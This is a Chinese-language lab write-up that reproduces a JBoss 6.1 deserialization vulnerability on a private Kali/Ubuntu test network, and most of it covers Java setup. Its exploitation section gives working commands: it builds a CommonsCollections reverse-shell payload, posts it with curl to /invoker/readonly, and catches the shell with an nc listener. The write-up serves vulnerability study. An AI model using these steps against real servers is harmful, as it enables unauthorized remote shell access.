30

0x00 环境搭建

攻击机:192.168.1.102(kali)

目标机:192.168.1.101(ubuntu)

使用ubuntu搭建漏洞环境

JBOSS 下载地址:http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip

配置java环境

删除java环境配置信息

(1) apt-get update

(2) apt-cache search java | awk '{print($1)}' | grep -E -e '^(ia32-)?(sun|oracle)-java' -e '^openjdk-' -e '^icedtea' -e '^(default|gcj)-j(re|dk)' -e '^gcj-(.*)-j(re|dk)' -e 'java-common' | xargs sudo apt-get -y remove

(3) apt-get -y autoremove

2、清除配置信息: dpkg -l | grep ^rc | awk '{print($2)}' | xargs sudo apt-get -y purge

3、清除java配置及缓存: bash -c 'ls -d /home/*/.java' | xargs sudo rm -rf

4、手动清除JVMs: rm -rf /usr/lib/jvm/*
安装javac环境(工具需要javac支持,默认安装的java无法执行javac)
官网下载完整版java环境,根据系统环境下载

创建单独目录
sudo mkdir /usr/local/java

将下载好的环境复制到/usr/local/java下

配置环境变量
sudo gedit /etc/environment

修改Path,JAVA_HOME是JDK的目录
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$JAVA_HOME/bin" export CLASSPATH=.:$JAVA_HOME/lib:$JAVA_HOME/jre/lib export JAVA_HOME=/usr/local/java/jdk名称

使环境变量立刻生效
source /etc/environment

配置所有用户的环境变量
为了预防重启后,配置的环境变量无效,配置所有用户的环境变量
sudo gedit /etc/profile

在文本末尾添加
#set Java environment export JAVA_HOME=/usr/local/java/jdk名称 export JRE_HOME=$JAVA_HOME/jre export CLASSPATH=.:$JAVA_HOME/lib:$JRE_HOME/lib:$CLASSPATH export PATH=$JAVA_HOME/bin:$JRE_HOME/bin:$PATH

执行全局设置立刻生效命令
source /etc/profile

重启
reboot

运行javac -version 、java -version
出现版本说明安装成功

设置允许远程访问

进入/jboss-6.1.0.Final/bin目录运行 sh run.sh

搭建成功截图

0x01 漏洞复现

访问以下连接出现500,则存在此漏洞

http://192.168.43.191:8080/invoker/readonly

使用工具验证漏洞

下载这个JavaDeserH2HC工具,用来反弹shell。(目标机下载运行)

目标机
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.102:80

curl http://192.168.1.101:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

攻击机运行 nc -lvvp 80

成功反弹!

0x02 总结

总体说遇到不少坑吧,第一个java环境,一开始环境没搭建好老是出问题,最后发现是没有安装javac环境,重新卸载了java,安装的完整版的。

第二个就是脚本需要在目标机下载运行,所以需要先下载到目标机,方法也挺多的。后续准备找下测试机器实战一下。。